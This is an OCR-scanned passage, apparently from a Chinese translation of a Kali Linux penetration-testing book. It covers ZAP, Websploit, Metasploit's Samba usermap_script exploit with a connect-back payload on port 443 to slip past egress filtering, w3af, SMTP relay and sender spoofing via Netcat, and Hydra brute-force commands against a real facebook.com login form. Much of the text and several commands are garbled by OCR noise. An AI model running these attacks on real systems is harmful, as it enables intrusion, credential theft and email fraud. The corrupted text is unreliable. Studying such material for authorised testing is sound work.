点 击 Flag as Content， 然 后 选择 它 是 登录 还 是 退出 登录 行为 。 


Sites) Quick Start 4 Responses 
| | GET:yuiloader-dom-event.js(v) [a] 


Header: Text |v] | Body: Text v]. C) 
|| GET:css.php(d,langid, sheet, styleid,td) ——— - 二 一 


| , GET:content.php 


HTTP/1.1 200 OK à 


| | GET:favicon.ico Server: Apache 
v llb forumrunner X-Powered-By: PHP/5.3.19 
|| GET:detect.js Cache-Control: private 


* | djdb Date: Tue, 14 May 2013 15:19:53 GMT / 


Pragma: private 
‘Set-Cookie: ms lastactivitw=0" exnires=Wedr 14-May-2014 15:19:53 GMT: | 
| var vb disable ajax = parselnt("O", I0J; | 


>| images 
li POST:login.php(do)(do,s,securitytoken, = 
|_| POST:profile.php(do)(do,s,securitytoke var SIMPLEVERSION - "421"; 
Lo http://www | ^ var BBURL = "huge s Wi orums" ; 
L Ri http://www.thesecurityblogger.com var LOGGEDIN - 14336 » O ? true : false; 
[3] http://www "hot nnn var THIS SCRIPT - "login"; = 
var RELPATH = ". ats SN 


var PATHS = { Flag as Context 1 ; Logged in indicator 
| furum = *'! Find... 


了 ?.: Logged out indicator 


EK —— —— | cms  : "" Encode/Decode/Hash... 
E L II mem 


Syntax - 
Forced Browse ^ Http Sessions $| iew Output 
Search < Break Points 2€ ^ nm Spider 3K 
can't Undo -trl+ Z 


Cross-domain]av| can't Redo neat 


Y (gà Alerts (5) | i 
> (gj ™ Directory browsing (44) | Reliability; Warning| COPY Ctrl+C 
A a Ee Tu PEE ET ee Parameter: https://a Paste -trl+\ 
> (Bj P» Private IP disclosure (93) Attack: Delete Delete 
> (Bj f» X-Content-Type-Options header missing (1655) Description: 


> (Bj ™ X-Frame-Options header not set (1353) 


Cut “tr 


Select All Ctrl+A 


The page at the| Save Raw > lipt files from a 
third-party doma 


4X | 


Jn LAE ios — b CST) oS FADES dr E EH 
这 样 在 Zaproxy 对 目标 进行 目 动 评估 的 过 程 中 ， 当 遇 到 任何 身份 认证 请 求 时 都 能 自动 登录 。 这 个 
功能 在 对 要 求 身 份 认证 的 网 站 进行 目 动 检测 时 很 有 用 。 


H 
| II 
Nau 
A 
d 
ap 
z 
m 


| Standard mode j[eluj|e[z5liG 5 WkENIENE ©: yi: 2s elel olh YO] 


| © Quick Start = Request Response 2 Break | 


Zaproxy 有 一 个 插件 市 场 ， 你 可 以 在 Help > Check for updates 中 找到 。 它 能 提供 其 他 一 些 可 
以 添加 到 Zaproxy 工 具 中 的 功能 。 


Manage Add-ons 


| Installed | Marketplace | 


Add-ons 
js 


Status Name Description | Update 

Release Fuzzdb files Fuzzdb v1.09 files which can be used with the ... 

Beta BeanShell Console Provides a BeanShell Console 

Beta Passive scanner rules... The beta quality Passive Scanner rules 

Beta Port Scanner Allows to port scan a target server 

Beta Report alert generator Allows you to generate reports for alerts you s... 

Beta Script Console Provides dynamic access to internal ZAP data ... 

Beta SVN Digger files SVN Digger files which can be used with ZAP f... 

Beta Token generation and... Allows you to generate and analyze pseudo ra... 

Beta TreeTools Tools to add functionality to the tree view. 

Alpha Active scanner rules (... The alpha quality Active Scanner rules 

Alpha Diff Displays a dialog showing the differences bet... 

Alpha Highlighter Allows you to highlight strings in the request a... 
| Alpha Passive scanner rules... The alpha quality Passive Scanner rules 

Alpha SCIP - Control Event E... Identify, enumerate and activate dormant and... 

Alpha Server-Sent Events Allows you to view Server-Sent Events (SSE) co... 


Ui NJ) — u) NJ  N) UI N 5 OW UN DY 


在 Report 标 签 下 ，Zaproxy 提 供 了 不 同 的 报告 选项 。 


Meee Tools Online Help 


Export Messages to File... 
Export Response to File... 
Export All URLs to File... 
Compare with another Session... 
Generate HTML Report... 


Generate XML Report... 


这 里 有 个 针对 www.thesecuritybloggercom 生 成 的 HTML 报 告 的 例子 。 


Low (Warning) Cross-domain JavaScript source file inclusion 


Description The page at the following URL includes one or more script files from a third-party domain 
URL http //www.thesecurityblogger.com 


Parameter https ://apis google .com/js/plusone js 


Solution Ensure JavaScript source files are loaded from only trusted sources, and the sources cant be controlled by end users of the application 


Reference 


Low (Warning) Cross-domain JavaScript source file inclusion 


Description The page at the following URL includes one or more script files from a third-party domain 


URL http ://www.thesecurityblogger.com 


Parameter http ://pagead2 googlesyndication.com/pagead/show_ads js 


Solution Ensure JavaScript source files are loaded from only trusted sources, and the sources cant be controlled by end users of the application 


Reference 
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3.1.6 Websploit 


Websploit 是 一 个 用 来 扫 质 和 分 析 远 程 系统 以 找到 漏 润 的 开源 项 目 。 


eae 你 可 以 浏览 Web Applications > Web Application Fuzzers ， 然 后 选择 
websploit。 它 会 先 弹 出 一 ms 里 面 显示 Websploit 的 横 条 。 你 可 以 通过 show modules 
np Vsus iiie ads 行 特定 模块 需要 的 条 件 。 


QR BI 


Network Modules 


network/arp_dos 
network/mfod 
network/mitm 
network/mlitm 
network/webkiller 
network/fakeupdate 
network/fakeap 


Ex p loit Modules 

exp loit/autopwn 
exploit/browser_autopwn 
exploit/java_applet 


Wireless Modules 


wifi/wifi_jammer 
wifi/wifi_dos 


wST > E 


你 要 输 人 use network/webkiller, 
运行 该 模块 。 


ws > use network/webkilLler 
wsf:Webkiller > set TARGET http 


ARP Cache Denial Of Service Attack 
Middle Finger Of Doom Attack 

Man In The Middle Attack 

Man Left In The Middle Attack 

TCP Kill Attack 

Fake Update Attack Using DNS Spoof 
Fake Access Point 


Description 

Metasploit Autopwn Service 
Metasploit Browser Autopwn Service 
Java- Applet-—Attack.{(Using HTML) 
Description 


Wifi Jammer 
Wifi Dos Attack 


输入 UsE, 后 跟 你 要 添加 的 模块 以 及 运行 时 需要 的 信息 。 举 个 例子 , 要 运行 wepkiller 模 块 ， 
然后 用 set TARGET 命令 来 设 定 攻击 的 目标 。 输 入 RUN 来 


: www, thasecurityblogger. gamy 


TAR "m => http://www.thesecurityblogger-com 
wsf:WebKiller > RUNE 


i8 718) #1) FA 


秀 测试 人 员 在 目标 侦察 阶段 投入 了 足够 的 时 间 和 资源 ,他 可 能 就 已 经 列 出 了 可 能 有 漏 
洞 的 那些 日 标 。 下 一 步 就 是 评估 每 个 目标 对 你 的 任务 的 价值 ， 并 进行 排序 。 可 以 佑 计 对 洪 在 漏洞 
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进行 利用 需要 投入 的 精力 ， 结 合 执行 攻击 时 的 连 市 风险 一 起 考虑 。Kali 中 目 市 的 源 洞 和 源 洞 利用 
工具 非常 适合 在 对 Web 应 用 服务 硕 进 行 侦 察 时 找 出 和 利用 漏洞 。 
3.2.1 Metasploit 


Metasploit 框 染 是 进行 服务 从 剖 攻 击 时 一 种 最 流行 的 功能 工具 。 它 也 被 认为 是 对 渗透 测试 人 
员 最 有 用 的 工具 之 一 。HD Moore 于 2003 年 创建 了 这 个 项 目 。 它 可 以 用 作 合 法 的 渗透 测试 工具 ， 
也 可 以 用 作 攻 击 者 进行 非 授 权 系统 汤 洞 利用 的 工具 。 


介绍 如 何 使 用 Metasploit 框 架 的 资料 非常 多 ,在 本 书 中 ,我 们 会 介绍 如 何 利 用 Metasploit 在 Web 
DME HS ed ETC m I D Tl AP] AG o 


Bs 


一 定 要 确保 启动 了 Postgres SQL 和 Metasploit 服 务 。 你 可 以 在 终端 窗口 中 以 


root 身 份 输入 service postgres start 和 service metasploit start 来 启动 。 


第 一 步 是 打开 一 个 控制 台 ， 输 入 msfconsole 来 启 动 Metasploit .msfconsole 是 局 动 
Metaspoit 最 常用 的 方式 。 它 提供 了 一 个 独立 的 用 户 界 面 来 访问 整个 Metasploit 框 染 。 一 些 人 简单 的 
命令 如 help 和 show 可 以 帮 你 熟悉 Metasploit。 


还 有 一 些 其 他 方法 也 可 以 用 来 局 动 Metasploit， 比 如 msfgui (基于 GUI ) 和 
f msfcli (基于 命令 行 )。 


除了 支持 调用 Metasploit 自 有 的 命令 ， ms fconsole 还 支持 调用 底层 的 OS 命令 ， 比如 ping 和 
nmap。 这 对 攻击 者 来 说 很 有 和 用， 因为 这 样 他 就 可 以 执行 常规 任务 ， 而 不 用 离开 控制 台 。 


在 我 们 的 第 一 步 中 ， 会 使 用 nmap 来 扫描 本 地 网 络 。 扫 描 结 果 会 自动 以 XML 文件 的 形式 添加 
到 Metasploit 中 。 


我 们 输入 的 命令 如 下 : 


nmap -n -oX my.xml network 


msf » nmap -n -oX my.xml 172.16.189.0/24 


[*] exec: nmap -n -oX my.xml 172.16.189.0/24 


我 们 将 从 nmap 输 出 的 结果 以 XML 文件 的 形式 导入 到 Metasploit 中 。 调 用 以 下 命令 : 


db import my.xml 
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对 主机 命令 做 个 快速 检查 ， 能 看 到 数据 导入 已 经 成 功 了 。Metasploit 已 经 拿 到 了 nmap 输 出 的 
数据 。 


我 们 还 会 调用 services 命 令 来 查看 Metasploit 中 可 用 的 服务 。 下 面 是 services 命 令 的 一 
个 示例 输出 : 


i i i 
Pa PJ PJ PJ Pd 


-EEEE "E" E" EE 
EAI ho RERI RI ki RJ m 


fA RT EL FA db\_nmapiit 9 —7» 56 I ma pit 77 FA tin AZ A ee 
库 的 工作 。 在 下 面 的 例子 中 ， 我 们 将 使 用 ab_ Made 目标 主机 使 用 nmap 命 令 进行 扫描 。 


-A 172.16.189.131 


我 们 可 以 调用 hosts 和 services 命 令 来 验证 Metasploit 已 经 在 数据 库 中 保留 了 相关 信息 。 


services 命 令 说 明 我 们 正在 使 用 Samba 文 件 共享 服务 。 让 我 们 来 看 看 是 否 能 找到 一 个 漏洞 
并 加 以 利用 。 "EE 虽然 在 这 个 例子 中 我 们 攻击 的 是 一 侣 真实 的 Web 服 务 硕 ， 但 我 们 找 出 的 并 不 
是 真 的 Web 漏 洞 。 真 实 攻 击 者 会 利用 Web 服 务 器 上 运行 的 所 有 软件 来 获取 信息 。 


我 们 可 以 看 到 有 几 个 可 利用 的 Samba 汤 洞 。 它 们 也 有 排名 。 我 们 会 利用 排名 徘 前 的 
usermap\_script 沁 洞 。 这 个 模块 会 利用 Samba 的 3.0.20 版 本 到 3.0.25rc3 版 本 之 间 存 在 的 命令 执 
行 漏洞 。 更 多 有 关 此 漏洞 利用 的 信息 可 以 参考 : http:/www.metasploit.com/modules/exploit/multi/ 


samba/usermap script. 


要 使 用 某 个 漏洞 ， 需 要 使 用 use 命 令 。 在 本 例 中 如 下 面 的 截图 所 未 : 
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选 好 了 要 利用 的 漏洞 后 , 我 们 需要 确定 在 执行 选 定 的 漏洞 时 还 需要 什么 信息 。 我 们 可 以 在 输 


出 中 找到 列 出 的 必 选 选项 ， 然 后 选择 要 使 用 的 攻击 载荷 。 调 用 show options, AA Wi 
选项 : 


可 以 在 这 个 例子 中 看 到 ， 我 们 需要 一 个 RHOST 参 数 。RHOST 是 我 们 要 攻击 的 远程 主机 的 人 P 地 
址 。 我 们 还 要 选择 攻击 载 集 并 设置 攻击 载 集 的 参数 。 攻 击 载 傈 是 一 段 可 目 行 注 人 并 执行 漏洞 利用 
的 代码 。 由 于 同 个 漏洞 在 多 种 方式 下 都 可 用 ,我 们 通常 也 会 有 多 个 可 选 的 攻击 载 倍 。 要 查看 可 用 
的 攻击 载荷 ， 可 输入 show payloads 命 令 。 
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找到 了 要 使 用 的 载 三 后 ， 下 一 步 是 使 用 set payload 命 令 后 跟 我 们 看 到 的 该 载 答 的 补丁 名 
PRRI ELERI o 


设置 好 了 攻击 载荷 后 ， 可 以 再 次 调用 show options KAA Aun] 4 I; EL 


我 们 能 看 到 这 个 载荷 需要 设置 LHosT 和 LPORT。LHOST 是 你 的 本 地 主机 ， 或 是 你 的 Metasploit 
攻击 者 沙 箱 的 卫 地 址 。 该 漏洞 利用 需要 让 远程 主机 连 回 托管 Metasploit 的 系统 , 所 以 远程 主机 需要 
知道 你 的 卫 地 址 。 


另外 ， 我 们 还 需要 设置 远程 主机 跟 Metasploit 通 信 的 端口 。 许 多 企业 环境 会 通过 防火 墙 或 路 
由 顷 来 限制 离 港 端口 。 最 好 的 办 法 是 使 用 公用 端口 ， 比 如 端口 443 ， 它 通 稼 是 专门 为 SSL 数 据 预 
留 的 ， 大 部 分 企业 也 人 允许 通过 这 个 端口 外 发 数据 。 使 用 443 端 口 的 另外 一 个 好 处 在 于 大 多 数 企 业 
都 不 会 审查 SSL 外 发 的 数据 。 我 们 发 现在 大 多 数 攻 击 中 将 443 端 口 用 作 LZPORT 可 以 避 开 该 企业 部 
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车 的 内 部 代理 工具 。 


完成 设置 选项 后 ,可 以 输入 exploit 来 运行 攻击 。 如 琳 该 漏洞 利用 成 功 运行 了 ,你 就 能 连接 
到 远程 服务 天 了 。 你 可 以 执行 任何 命令 。 在 这 个 例子 中 ， 这 个 漏洞 利用 拿 到 了 了 root 权限。root 权 
限 意味 看 你 拥有 了 远程 日 标 服务 从 的 所有 权限 。 


Metasploit 框 架 有 各 种 各 样 的 漏洞 利用 和 攻击 载 信 选项。 你 可 以 在 http://www.metasploit.com 
查看 所 有 可 用 的 选项 。 


3.2.2 w3af 
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w3af 是 Web Application Attack and Audit Framework ( Web 应 用 攻击 和 安全 审计 框架 ) 的 缩写 。 
它 是 一 个 开源 的 Web 应 用 安全 扫描 硕 和 漏洞 利用 工具 。W3af 可 通过 Web Application Assessment > 
Web Vulnerability Scanners > w3af} J FF. 


w3af 提 供 了 一 个 问 导 界面 。 不 过 , 它 并 不 是 正确 执行 扫描 的 必要 条 件 。 第 一 步 先 创建 一 个 新 
配置 或 是 利用 已 有 的 配置 。 配置 用 来 将 可 以 在 目标 上 运行 的 插件 聚合 起 来 。w3af 季 有 一 些 很 赞 的 
默认 聚合 分 组 ， 比 如 OWASP TOP10。 现 有 插件 的 定义 会 在 你 选中 插件 时 显示 在 中 间 的 窗口 中 ， 
比如 下 面 例子 中 的 OWASP TOP10 配 置 。 可 以 在 左边 栏 中 选择 现 有 的 配置 ， 或 是 新 建 的 配置 。 如 
果 你 用 的 是 新 配置 或 是 编辑 已 有 配置 ， 可 以 勾 选 你 想 用 来 扫描 的 所 有 插件 。 勾 选 的 插件 越 多 , 扫 
描 持 续 的 时 间 就 越 长 。 如 果 勾 选 了 一 大 片 分 组 ，w3af 会 警告 你 这 么 多 分 组 可 能 要 用 很 长 时 间 。 点 
E Start H iR HH o 


The Open Web Application Security Project (OWASP) is 
a worldwide free and open community focused on 


improving the security of application software. OWASP 


searched for and published the ten most common 
security flaws. This profile search for this top 10 
security flaws. For more information about the security 
flaws: http://www.owasp.org/index.php/ 
OWASP_Top_Ten_Project . 


下 一 步 ， 在 Target: 字 段 中 输入 目标 URL， 然 后 点 击 Start 来 运行 扫描 。 下 面 的 截图 显示 的 是 
我 们 对 w3af 进 行 配 置 扫描 wwwi.thesecurityblogger.com: 


Profiles Edit Tools Configuration Help 


a 


Scan config 


Profiles Target: |http://www.thesecurityblogger.com | Start | | € | 


ony are Plugin Active 
+| audit 图 
auth 
bruteforce 


audit_high_risk 
bruteforce 

fast_scan 

full_audit 

full audit manual dist 


discovery 图 
evasion 
grep EJ 


sitemap 
web infrastructure 


Plugin Active 
+| output @ 


Mangle plugins modify requests on the fly. 


w3af 会 在 Log 答 口中 显示 当前 进行 的 扫描 的 状态 。w3af 会 试看 预 估 扫 描 完成 需要 的 时 间 。 
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Vulnerabilities @% Information 8j Error 


[Fri 26 Apr 2013 03:32:41 AM EDT] A comment with the string "warning" was found in: "http://www.thesecurityblogger.com". This could be 
interesting. This information was found in the request with id 1. 

[Fri 26 Apr 2013 03:32:41 AM EDT] A comment with the string "puta" was found in: “http://www.thesecurityblogger.com". This could be interesting. 
This information was found in the request with id 1. 

[Fri 26 Apr 2013 03:32:41 AM EDT] A comment with the string "email" was found in: "http://www.thesecurityblogger.com". This could be interesting. 
This information was found in the request with id 1. 

[Fri 26 Apr 2013 03:32:41 AM EDT] A comment with the string "security" was found in: "http://www.thesecurityblogger.com". This could be 
interesting. This information was found in the request with id 1. 

[Fri 26 Apr 2013 03:32:41 AM EDT] A comment with the string "captcha" was found in: "http://www.thesecurityblogger.com". This could be 
interesting. This information was found in the request with id 1. 

[Fri 26 Apr 2013 03:32:41 AM EDT] The uri parameter of xUrllib.POST() must be of urlParser.url object type. 

[Fri 26 Apr 2013 03:32:41 AM EDT] The uri parameter of xUrllib.POST() must be of urlParser.url object type. 

[Fri 26 Apr 2013 03:32:41 AM EDT] webDiff plugin: You have to configure the local and remote directory to compare. 


Discovery progress: 5.263 % - ETA: 00d 00h 06m 10s 
Running discovery.fingerPKS on http://www.thesecurityblogger.com | Method: GET. 


要 查看 扫描 的 结果 ， 点 击 Results 标 签 。Results 标 签 会 提供 找到 的 潜在 漏洞 的 详情 。Exploit 
标签 会 基于 发 现 的 漏洞 显示 可 能 的 漏洞 利用 。 


Scan config Log Results “Exploit 


KB Browser | URLs Request/Response navigator | 


Vuln Info O Misc IThe remote web server sent the HTTP header: "Link" with value: "«http:// 
Knowledge Base wp.me/1Lfwo>; rel=shortlink". This information was found in the request with id 1. 


-|  findComments (1) 
| interestingComments (9) 
@ HTML comment with "user" inside i - 
@ HTML comment with "pass" inside Request Response 


@ HTML comment with "fix" inside Raw | Headers | 
@ HTML comment with "hack" inside 


POST http://www.thesecurityblogger.com HTTP/1.1 
Host: www.thesecurityblogger.com 


@ HTML comment with "warning" inside 


@ HTML comment with "puta" inside || Content-Type: application/x-www-form-urlencoded 
Q HTML comment with "email" inside || Accept-Encoding: gzip 


a dn Accept: */* 
@ HTML comment with "security" inside User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; 
@ HTML comment with "captcha" inside Trident/4.0; w3af.sf.net) 


*|  strangeParameters (1) 
-|  strangeHeaders (1) 
[= strangeHeaders (2) 


i Strange header 


@ Strange header 
=) clickjacking (1) g e| & 加 Ml] 
=)  dickJacking (1) , - 


20 A 


%25uFF - 20525uFF2e*25uFF4f*s25uFF4e*:25uFF45-&VY8Mx8yXbZKq-3YeRBTeJd1 


w3af 人 允许 用 户 对 审计 阶段 找到 的 漏洞 加 以 利用 。 漏洞 找 出 后 , 会 被 存储 到 知识 库 中 的 特定 地 
方 。 漏 洞 利用 插件 会 从 那个 地 方 恋 取信 息 ,， 然 后 使 用 这 些 信息 来 对 漏洞 加 以 利用 。 如 果 漏 洞 利用 
成 功 了 ， 你 会 获得 日 标 系 统 上 的 一 个 shell。 下 面 的 截图 显示 了 www.ntew3af 插 件 正 在 对 
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Scan config Log Results Exploit 


Exploits Vulnerabilities Shells 
A Unhandled error in web application 

eval A Unident8e dole cae 

x Multiple Exploit! 

fileUploadShell Hint #2: Use the set command to enter tne Values YOurselr, and 
localFileReader then exploit it using fastExploit 
No [blind] SQL injection vulnerabilities have been found. 
Hint #1: Try to find vulnerabilities using the audit plugins. 
remoteFileincludeShell Hint #2: Use the set command to enter the values yourself, and 
rfiProxy then exploit it using fastExploit. 
No [blind] SQL injection vulnerabilities have been found. 
Hint #1: Try to find vulnerabilities using the audit plugins. 
sqimap Hint #2: Use the set command to enter the values yourself, and 
xpath then exploit it using fastExploit. 


osCommandingShell 


sql webshell 


Exploiting 'davShell'... 


在 w3af 工 具 集 中 ， 有 很 多 有 用 的 功能 。 你 可 以 通过 http:/w3aforg/ 了 解 更 多 信息 。 


3.3 利用 电子 邮件 系统 的 漏 酒 


从 本 质 上 说 , 所 有 电子 邮件 系统 都 要 接 入 互联 网 , 接受 来 自 外 部 的 匿名 访问 , 这样 才 能 起 作 
用 。 许多 企业 用 户 都 会 通过 电子 邮件 发 送 机 密 信 息 。 在 大 多 数 环境 中 , 电子 邮件 服务 天 都 会 保存 
一 些 有 价值 的 信息 ,这 使 得 它们 成 为 了 攻击 者 的 最 高 优先 级 日 标 。 对 使 用 者 来 说 , 好 消息 是 只 要 
正确 配置 了 , 现代 电子 邮件 系统 是 极其 难 被 抓 住 汤 洞 的 。 但 这 并 不 音 味 着 电子 邮件 系统 对 攻击 就 
是 免疫 的 。 大 多 数 邮 件 系 统 痢 有 Web 应 用 ， 并 可 以 通过 Web 界 面 访问 。 这 提高 了 远程 攻击 者 获取 
核心 系统 访问 权限 的 可 能 性 ， 攻 击 者 可 以 利用 它 作 为 跳板 ， 连 接 到 内 网 的 其 他 系统 。 


在 我 们 将 邮件 系统 作为 目标 之 前 , 首先 需要 知道 托管 邮件 服务 融 的 是 什么 系统 。 如 果 不 知 道 
这 些 信 息 , 可 以 借鉴 我 们 在 第 2 章 中 学 到 的 侦察 技术 。 在 这 个 例子 中 , 我 们 会 用 Fierce 来 找 出 特定 
域名 的 MX 主机 。 在 大 多 数 情况 下 ， MX 主机 就 是 SMTP 服 务 磊 。 下 面 是 对 www.cloudcentrics.com 
运行 Fierce 的 例子 : 


ns3682.hostgator.com 
ns3681.hostgator.com 


Trying zone transfer first... 
Testing ns3682.hostgator.com 
Request timed out or transfer not allowed. 


Testing ns3681.hostgator.com 
Request timed out or transfer not allowed. 


Unsuccessful in zone transfer (it, was worth a shot) 
Okay, trying the good old fashioned way... brute farce 
Can't open hosts.txt or the-default werdtist 
Exiting... 

: ~# 
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首 允 ,需要 碍 看 目标 邮件 服务 天 是 否 有 可 以 执行 二 接 命令 的 漏洞 。 大 多 数 攻 击 者 都 想 利 用 邮 
件 服务 天 来 仿冒 邮件 ， 使 用 邮件 服务 带 作 为 非 授 权 的 邮件 中 继 服 务 负 。 本 书 将 会 在 第 4 章 中 进 一 
步 介绍 如 何 利 用 侵入 的 邮件 服务 融 进 行 社会 工程 。 


在 这 个 例子 中 ， 我 们 会 使 用 Netcat 作 为 连接 到 邮件 服务 硕 的 工具 。Netcat 是 一 个 用 于 读 取 或 
写 人 通过 TCP 或 UDP 进行 的 网 络 连接 的 计算 机 网 络 服务 。Netcat 被 设计 成 了 那 种 可 以 依赖 的 后 端 
设备 ,方便 下 接 使 用 或 易于 被 其 他 程序 或 脚本 驱动 。Netcat 同 时 也 是 一 个 功能 丰 定 的 网 络 调试 和 
调查 工具 ， 它 可 以 通过 日 市 的 多 种 功能 来 生成 各 种 关联 关系 。 


启动 Netcat 津 用 的 方法 是 调用 命令 netcat mail-server port. 在 本 例 中 ,日 标 邮 件 服务 
器 是 运行 在 端口 23 上 。 我 们 在 第 2? 章 介绍 侦察 步骤 时 用 nmap 验 证 过 这 部 分 信息 。 


使 用 Netcat 连 接 到 邮件 服务 硕 后 ， 使 用 HELo 命 令 来 告诉 服务 融 我 们 的 号 份 。 


如 果 收 到 了 啊 应 ， 可 以 使 用 SMTP 命 令 对 大 多 数 服务 需 进 行 操作 (有些 系统 可 能 由 于 配置 和 
系统 类 型 的 原因 而 不 可 侵入 )。 在 下 面 的 例子 中 , 一 开始 会 通过 HELo 命 令 告 诉 服务 器 我 们 的 身份 。 
之 后 ， 就 可 以 用 该 邮件 服务 需 来 为 将 来 的 客户 端 攻击 做 邮件 中 继 了 。 

H/gHELO, MAIL FROM, RCP To 和 Data 字 段 是 必 填 的 。 你 可 以 用 其 他 字段 来 隐藏 邮件 的 


发 件 人 并 修改 reply to 字段 。 这 里 举 个 例子 ， 你 可 以 修改 *eply to 地 址 来 达到 让 收 件 人 将 电子 
邮件 误 回 给 其 他 人 的 目的 。 


MAIL FROM: someone_importantecloudcentrics.com 


完整 的 SMTP 命 令 清单 可 以 在 SMTP RFC 中 找到 ， 或 是 通过 谷歌 找到 。 


3.4 ”暴力 破解 攻击 


骏 力 破解 攻击 是 指 对 加 密 数 据 尝 试 所 有 可 能 的 密 文 , 下 到 找到 正确 的 密 文 。 从 资源 和 时 间 占 
用 的 角度 看 , 骏 力 破解 攻击 的 成 本 极其 高 。 攻 击 者 通 汕 是 看 中 了 密 文 的 长 度 限 制 和 密 文 的 和 价 单 性 
来 对 加 密 中 的 漏洞 加 以 利用 。 如 有 果 密 文通 常 是 基于 字典 中 的 单词 , 那么 这 意味 着 攻击 者 需要 测试 
的 全 部 空间 就 是 对 应 的 词典 中 的 所 有 单词 , 这 使 得 猜测 的 范围 远 小 于 采用 随机 字符 的 单词 。 避 人 免 
骏 力 破解 攻击 的 最 好 办 法 是 使 用 很 长 的 复杂 的 密 文 , 外 加 答 试 在 干 次 数 后 采用 超时 阻止 等 其 他 方 
法 来 提高 安全 因 了 于。 


3.4.1 Hydra 


Hydra‘ Hi The Hacker’s Choice (THC ) 开发 的 一 款 工具 , 它 使 用 暴力 破解 攻击 方法 来 测试 
一 系列 不 同 的 协议 。 它 是 攻击 邮件 系统 的 理想 选择 ， 因 为 Hydra 可 以 锁定 特定 的 IP 和 协议 ， 比 如 
邮件 系统 使 用 的 POP3 和 SMTP 的 管理 员 账 户 。 


在 局 动 Hydra 之 前 ,应 该 对 目标 进行 侦察 工作 ， 比 如 邮件 系统 。 第 2 章 中 介绍 了 漏洞 评 佑 工具 
Zzenmap， 它 可 以 用 来 为 Hydra 收 集 如 下 信息 : 


OQ 目标 系统 的 卫 地 址 ( 比如 192.168.1.1); 

O 开放 的 端口 〈 比 如 端口 80 或 2 ); 

a 协议 ( 比如 给 Web 用 的 HTTP 或 给 邮件 用 的 SMTP ); 
O 用 户 名 ( 比如 admin )。 


为 一 个 剃 跟 Hydra 搭 配 使 用 的 侦察 工具 是 Firefox 插 件 Tamper Data. 


& ADD-ONS 


f» » Tamper Data 


@ Tamper Data 
ae by 167,930 
7,930 users 


Use tamperdata to view and modify HTTP/HTTPS headers and post parameters... 


—— -一 -= 一 一 一 一 一 一 一 -一 一 一 


Meet the Developer: 


Learn why Tamper Data was created and find out what's next for this add-on. 


Tamper Data 是 由 Adam Judson 开 发 的 。 它 允许 攻击 者 查看 HTTP 和 HTTPS 的 GET 和 POST 信 
上 县。 在 使 用 如 Hydra 一 类 的 工具 进 人 TARZTIBOREEGHRS a 这 些 信 息 非 党 有 用 , 因为 你 可 以 目 动 化 Hydra 
来 打开 网 页 ， 并 对 不 同 的 用 户 名 和 密码 组 合 进行 测试 。 


Ja Tamper Data 插 件 后 ， 我 们 就 能 在 对 Web 表 竺 提交 用 户 名 之 前 局 动 该 插件 了 。 
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4. Connecting E 
€ P an 
© Most Visited |. Getting Started 


Po. ft 
Cisco Security Partners 一 


eve facebook cam 
Time | | Gmail && iCloud [5 Tech 


facebook 


Connect with friends and the 
world around you on Facebook. 


It's free and always will be. 


L1 Tamper Data - Ongoing requests = © 


= Start Tamper Mop Tamper Clear Options. Help 
File SE 
Content Type URL Load Flags m| 
text/xmil https... LOAD BACK... 
text/xmi https... LOAD &YPASS... 


Tire Duration 
1:3548. 1116 ms 
Tos. 1840 ms 


Total Duration Sine Method Saud 
1115 ms -1 GET ZU 


1840 ms H4 GET 200 


mtps//versidd a | " 
e ids (d'10düb GD nupsimww.tacebocikcomnoginphp?togin attempts 1 


fet) Continue w| Continue Tampering? 


Tamqer Submit Abort Request 


‘Tamper Data 会 显示 在 字段 了 分 组 中 输入 的 信息 JN O 攻击 者 可 以 对 这 文 些 数 据 进 行 
即使 该 网 站 是 经 过 加 密 的 。 


操作 并 重新 提交 ， 


https://secure.wwt.com/nidp/saml2/sso?sid=0 


Request Header Na... Request Hea... Post Parameter Na... Post Paramet... 


Host secure.wwt.cor | || option credential 


User-Agent 
Accept 
Accept-Language 
Accept-Encoding 
Referer 


Cookie 


Mozilla/5.0 (W 
text/html,appli 


en-US,en;q=0.! 


gzip, deflate 


| https://secure.\ 


JSESSIONID=3 


Ecom_User_ID 
Ecom_Password 


loginButton2 


pinkprincess 


Login 


Cancel 


在 本 例 中 ， 我 们 看 到 当 用 户 点 击 login 按 钮 时 提交 WHF A pink 但 pinkprincess。 


这 两 个 例子 是 对 目标 进 和 


了 侦察 以 收集 Hydra 需 要 的 有 用 信息 的 两 个 实用 方法 。Kali 中 还 有 一 


大 把 的 其 他 方法 和 自 带 工具 可 以 用 来 收集 Hydra 中 用 到 的 Web 人 信息。 不 过 ， 我 们 推荐 使 用 Netcat 
和 Tamper Data。 它 们 是 目前 最 有 效 的 方法 。 
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现在 已 经 完成 了 侦察 阶段 ， 让 我 们 启动 Hydra 看 看 如 何 使 用 侦察 阶段 收集 到 的 信息 来 进行 暴 
力 人 破解 密码 攻击 。 


要 在 Kali 中 访问 Hydra, 浏览 Password Attacks > Online Attacks, 然后 选择 Hydra。 它 会 打开 
一 个 终端 窗口 ， 然 后 目 动 司 动 Hydra。 


Hydra is a tool to guess/crack valid login/password pairs - usage only allowed 
for Legal purposes. Newest version available at http://www.thc.org/thc-hydra 
The following services were not compiled in: sapr3 oracle. 


Examples: 
hydra -L john -p doe 192,168.0.1\ ftp 
hydra -L user.txt -p defaultpw +S 192.168.0.1 imap PLAIN 
hydra -l admin -P pass.txt http -proxy's//192-168 +6 .+ 


hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fel2:acl1]:143/DIGEST -MD5 
:~# 


终端 窗口 中 的 开头 文档 解释 了 如 何 运 行 Hydra。 举 个 例子 ， 如 果 你 想 要 使 用 SMTP 攻 击 一 个 
位 于 192.168.1.1 的 管理 员 账 户 的 密码 文件 ， 可 以 输入 : 


hydra -1 admin -p /root/password.txt 192.168.1.1 smtp 


如 有 果 要 在 Web 表 单 中 使 用 Hydra， 我 们 就 需要 收集 之 前 在 Tamper Data 插 件 中 收集 到 的 信息 。 
在 Web 表 单 中 使 用 Hydra 的 语法 是 <ur1 > :< 表单 参数 >:< 失 败 字 符 串 >。 


URL-https://www.facebook.com/login.php?login attempt-1email-pinkpasswd- 
pinkprincesslloginse"log in" 


现在 可 以 运行 Hydra 了 。 你 需要 提供 一 个 含有 用 户 名 的 文件 ， 还 需要 一 个 含有 密码 的 文件 。 


hydra -L /cloudcentrics/usernamelist -P /cloudcentrics/passwords demo _ 
file.txtt -facebook.com http-get-form "login.php?login attempt-1:username 
-^EMAIL^&TOKEN-^PASSWORD^&login-Login:incorrect" 


